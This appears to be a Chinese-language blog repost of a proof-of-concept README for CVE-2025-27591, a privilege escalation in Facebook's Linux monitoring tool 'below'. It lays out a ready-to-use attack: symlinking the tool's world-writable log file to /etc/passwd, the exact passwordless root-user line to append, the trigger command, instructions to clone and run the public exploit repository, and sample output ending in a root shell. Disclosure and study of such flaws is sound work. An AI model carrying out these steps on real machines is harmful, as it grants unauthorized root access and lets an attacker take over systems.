Facebook below工具权限分配不当漏洞利用分析(CVE-2025-27591)

本文详细分析了Facebook开发的Linux性能监控工具below中存在的权限分配不当漏洞CVE-2025-27591。该漏洞允许本地非特权用户通过符号链接滥用和日志文件注入技术实现到root权限的提权,CVSS评分约为7.8-8.8分。

CVE-2025-27591 – 通过符号链接滥用实现权限提升

作者

🛑 免责声明: 此漏洞利用代码仅用于教育目的和授权安全测试。未经授权使用可能违法。

🧠 概述

below是Facebook为Linux系统开发的性能监控工具。在修补版本之前的below版本存在一个严重漏洞,允许非特权用户通过利用全局可写日志目录和未经过滤的日志处理来提升到root权限。

🔎 CVE详情

字段
CVE-ID CVE-2025-27591
严重性 🔥 严重 (CVSS ≈ 7.8 - 8.8)
攻击向量 本地
影响 权限提升至root (UID=0)
利用类型 符号链接滥用/日志文件注入
受影响应用 below – 通常安装为/usr/bin/below
根本原因 /var/log/below/的不安全文件写入,缺乏权限检查

💥 利用逻辑

此Bash脚本执行以下操作:

  1. 检查全局可写目录

    • 确认/var/log/below是否为全局可写(危险标志)。

  2. 准备符号链接攻击

    • 删除现有的error_root.log(如有)并创建指向/etc/passwd的符号链接。

  3. 载荷构建

    • /etc/passwd追加伪造的root用户: 
      1

      fakeadmin::0:0:fakeadmin:/root:/bin/bash

  4. 触发日志记录

    • 运行sudo below record强制易受攻击的二进制文件写入日志。

  5. 获取root访问权限

    • 使用su fakeadmin获取无需密码提示的root shell。

📁 目录结构 

1
2

CVE-2025-27591-bash/
├── exploit.sh

✅ 前提条件

运行利用代码前,确保具备以下条件:

  • Bash shell(Linux系统)
  • 已安装易受攻击的二进制文件:/usr/bin/below
  • 全局可写日志目录:/var/log/below
  • 执行sudo below record的sudo权限
  • 可用工具:
    • ln(创建符号链接)
    • su(切换用户)
    • timeout(控制执行时间)
    • whoami(权限检查)

🚀 利用步骤 

1
2
3
4
5
6
7
8
9

# 1. 克隆仓库
git clone https://github.com/00xCanelo/CVE-2025-27591-PoC.git
cd CVE-2025-27591-PoC

# 2. 使脚本可执行
chmod +x exploit.sh

# 3. 执行利用代码
./exploit.sh

🧪 示例输出 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

[*] 检查CVE-2025-27591漏洞...
[+] /var/log/below是全局可写的。
[!] 发现现有日志文件:正在删除...
[+] 创建符号链接:/var/log/below/error_root.log -> /etc/passwd

[*] 向/tmp/fakeadmin写入恶意行
[*] 通过'sudo below record'触发日志记录...
[+] 'below record'已执行(或超时)

[*] 尝试通过符号链接向/etc/passwd写入载荷...
[+] 载荷成功追加。

[*] 尝试使用'su fakeadmin'切换到root shell...
root@target:/# whoami
root
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次